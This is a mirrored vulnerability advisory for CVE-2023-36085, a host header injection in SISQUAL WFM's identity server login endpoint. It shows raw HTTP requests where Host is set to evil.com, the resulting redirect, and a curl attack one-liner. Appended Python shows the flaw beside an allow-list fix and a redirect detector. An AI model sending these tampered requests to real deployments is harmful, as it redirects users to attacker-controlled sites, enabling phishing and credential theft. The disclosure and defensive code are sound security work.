SISQUAL WFM 7.1.319.103 Host Header Injection
2024-2-7 04:32:21 Author: cxsecurity.com (view original)

# Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection
# Discovered Date: 17/03/2023
# Reported Date: 17/03/2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://www.sisqualwfm.com
# Version: 7.1.319.103
# Tested on: SISQUAL WFM 7.1.319.103
# Affected Version: sisqualWFM - 7.1.319.103
# Fixed Version: sisqualWFM - 7.1.319.111
# CVE : CVE-2023-36085
# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category: Web Apps
# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085

A proof-of-concept (PoC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the Host header.

****************************************************************************************************
Original Request
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

****************************************************************************************************
Original Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0

****************************************************************************************************
POC
****************************************************************************************************
Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

****************************************************************************************************
Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 0

****************************************************************************************************
Method of Attack
****************************************************************************************************
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
****************************************************************************************************
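The request/response pair above shows the whole defect: the server copies the client-supplied Host into the Location header of its 302. The following Python is an added illustration, not code from the advisory and not SISQUAL's implementation (which is not public here). It places that vulnerable pattern beside a hardened handler that accepts only an allow-listed Host and builds the redirect from a configured canonical host, and adds a small check a defender can run over captured responses to spot off-site redirects. The sample requests are constructed from the two requests in the advisory, and the allow-list (sisqualwfm.cloud) is an assumed deployment setting.

```python
"""Host header injection as a redirect bug: the pattern described in the advisory
(Location built from the client-supplied Host) beside a hardened version that only
trusts an allow-list, plus a check a defender can run over captured responses.
Added example; not code from the advisory or from the SISQUAL product."""
import re
from urllib.parse import urlsplit

REDIRECT_PATH = "/sisqualIdentityServer/core/"

# Constructed sample traffic, trimmed from the two requests shown in the advisory.
ORIGINAL_REQUEST = (
    "GET /sisqualIdentityServer/core/login HTTP/2\r\n"
    "Host: sisqualwfm.cloud\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "\r\n"
)
TAMPERED_REQUEST = (
    "GET /sisqualIdentityServer/core/login HTTP/2\r\n"
    "Host: evil.com\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "\r\n"
)

# Assumed deployment settings: the hosts this instance is legitimately served on,
# and the one canonical host every absolute URL is built from.
ALLOWED_HOSTS = frozenset({"sisqualwfm.cloud"})
CANONICAL_HOST = "sisqualwfm.cloud"

# Strict Host grammar: a hostname with an optional port, nothing else. A permissive
# URL parser would accept "evil.com@sisqualwfm.cloud" and report the part after the
# "@" as the hostname, so the allow-list check must not be built on one.
_HOST_RE = re.compile(r"^([a-z0-9](?:[a-z0-9.-]*[a-z0-9])?)(?::\d{1,5})?$")


def parse_request(raw: str) -> tuple[str, str, dict[str, str]]:
    """Split a raw HTTP request into (method, path, headers); header names lowercased."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def vulnerable_redirect(raw: str) -> tuple[int, dict[str, str]]:
    """The behaviour the advisory reports: the redirect target's host is copied from
    the request, so whoever controls the Host header controls where the user lands."""
    _method, _path, headers = parse_request(raw)
    host = headers.get("host", "")
    return 302, {"Location": f"https://{host}{REDIRECT_PATH}"}


def hardened_redirect(raw: str, allowed_hosts=ALLOWED_HOSTS,
                      canonical_host=CANONICAL_HOST) -> tuple[int, dict[str, str]]:
    """Reject any request whose Host is not allow-listed before building a URL, and
    build the Location from configuration rather than from request input."""
    _method, _path, headers = parse_request(raw)
    match = _HOST_RE.match(headers.get("host", "").lower())
    if match is None or match.group(1) not in allowed_hosts:
        return 400, {}
    return 302, {"Location": f"https://{canonical_host}{REDIRECT_PATH}"}


def offsite_redirect(status: int, headers: dict[str, str],
                     allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Detection check for captured or proxied responses: a 3xx whose Location host is
    outside the allow-list is the observable symptom of this class of bug."""
    if not 300 <= status < 400 or "Location" not in headers:
        return False
    target = (urlsplit(headers["Location"]).hostname or "").lower()
    return target not in allowed_hosts


if __name__ == "__main__":
    for label, handler in (("vulnerable", vulnerable_redirect), ("hardened", hardened_redirect)):
        status, headers = handler(TAMPERED_REQUEST)
        print(f"{label}: {status} {headers.get('Location', '-')} "
              f"offsite={offsite_redirect(status, headers)}")
```

Two design points matter in practice. First, the fix is a hard reject (400) rather than a silent fallback to the canonical host: an unexpected Host is a misrouted or tampered request, and rejecting it also makes the attempts visible in access logs. Second, the same allow-list drives the response-side check, so a proxy or log pipeline can flag any 3xx whose Location leaves the allowed hosts, which is exactly what the tampered response in the advisory would trigger. The `tuple[...]`/`dict[...]` annotations need Python 3.9 or later.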
Source: https://cxsecurity.com/issue/WLB-2024020026